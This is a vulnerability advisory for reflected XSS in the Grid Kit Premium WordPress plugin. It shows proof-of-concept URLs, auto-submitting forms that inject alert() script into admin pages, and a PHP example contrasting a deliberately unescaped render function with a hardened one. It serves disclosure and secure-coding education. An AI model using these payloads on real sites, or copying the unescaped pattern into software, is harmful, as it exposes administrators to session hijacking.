WordPress Plugin Vulnerabilities
Grid Kit Premium < 2.2.0 - Multiple Reflected Cross-Site Scripting
Description
The plugin does not escape some parameters, or the URLs it generates, before outputting them in attributes, leading to Reflected Cross-Site Scripting which could be used against high-privilege users such as admins.
Proof of Concept
Make a logged-in admin open one of the URLs below:

https://example.com/wp-admin/admin.php?page=grid-kit-product-reviews&a"><script>alert(/XSS/)</script>
https://example.com/wp-admin/admin.php?page=grid-kit-product-enquiries&"><script>alert(/XSS/)</script>

Make a logged-in admin open a page containing the HTML code below:

<body onload="document.forms[0].submit()">
    <form action="https://example.com/wp-admin/admin.php?page=grid-kit-product-reviews" method="POST">
        <input type="text" name="page" value='"><img src onerror=alert(/XSS/)>'>
        <input type="submit" value="submit">
    </form>
</body>

<body onload="document.forms[0].submit()">
    <form action="https://example.com/wp-admin/admin.php?page=grid-kit-product-enquiries" method="POST">
        <input type="text" name="page" value='"><img src onerror=alert(/XSS/)>'>
        <input type="submit" value="submit">
    </form>
</body>

Requires at least one gallery to be present:

<body onload="document.forms[0].submit()">
    <form action="https://example.com/wp-admin/admin.php?page=grid-kit" method="POST">
        <input type="text" name="page" value='"><img src onerror=alert(/XSS/)>'>
        <input type="submit" value="submit">
    </form>
</body>

Other vulnerable URLs (when there is at least one item in the table):
- https://example.com/wp-admin/admin.php?page=grid-kit-product-enquiries
- https://example.com/wp-admin/admin.php?page=grid-kit-product-reviews
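The class of bug described above, shown beside a hardened form, as an added example that is not the plugin's own code (the page does not show how Grid Kit reads or prints these values). The function names, the `attr()` helper and the rendered markup are hypothetical; only the three page slugs come from this advisory.

```php
<?php
// Added example: a hypothetical admin-page helper, not Grid Kit's code.
// Plain PHP so it runs under the php CLI; inside WordPress the output
// helpers would be esc_attr() and esc_url() instead of attr().

const KNOWN_PAGES = ['grid-kit', 'grid-kit-product-reviews', 'grid-kit-product-enquiries'];

// Vulnerable pattern: decoded request data is concatenated into attributes.
function render_unsafe(array $params): string {
    $pairs = [];
    foreach ($params as $key => $value) {
        $pairs[] = $key . '=' . $value;          // parameter names are request-controlled too
    }
    $url = 'admin.php?' . implode('&', $pairs);  // the "generated URL"
    return '<a href="' . $url . '">Refresh</a>'
         . '<input type="hidden" name="page" value="' . ($params['page'] ?? '') . '">';
}

// Escape a string for use inside a quoted HTML attribute value.
function attr(string $value): string {
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Hardened: allow-list the slug, drop unknown parameters, URL-encode while
// building the query string, then escape again at the point of output.
function render_safe(array $params): string {
    $page = $params['page'] ?? '';
    if (!is_string($page) || !in_array($page, KNOWN_PAGES, true)) {
        $page = KNOWN_PAGES[0];
    }
    $url = 'admin.php?' . http_build_query(['page' => $page]);
    return '<a href="' . attr($url) . '">Refresh</a>'
         . '<input type="hidden" name="page" value="' . attr($page) . '">';
}

// Constructed inputs shaped like the two request types in the proof of concept.
$from_query = ['page' => 'grid-kit-product-reviews', 'a"><script>alert(/XSS/)</script>' => ''];
$from_post  = ['page' => '"><img src onerror=alert(/XSS/)>'];

foreach ([$from_query, $from_post] as $params) {
    echo "unsafe: ", render_unsafe($params), "\n";
    echo "safe:   ", render_safe($params), "\n\n";
}
```

In the unsafe output the `">` sequence closes the attribute and the injected tag lands in the markup; in the safe output the unknown parameter is dropped and the invalid slug falls back to a known page before anything is printed.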
Affects Plugins
References
CVE
Classification
Type
XSS
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Erwan LR (WPScan)
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2023-07-10 (about 4 months ago)
Added
2023-07-10 (about 4 months ago)
Last Updated
2023-07-10 (about 4 months ago)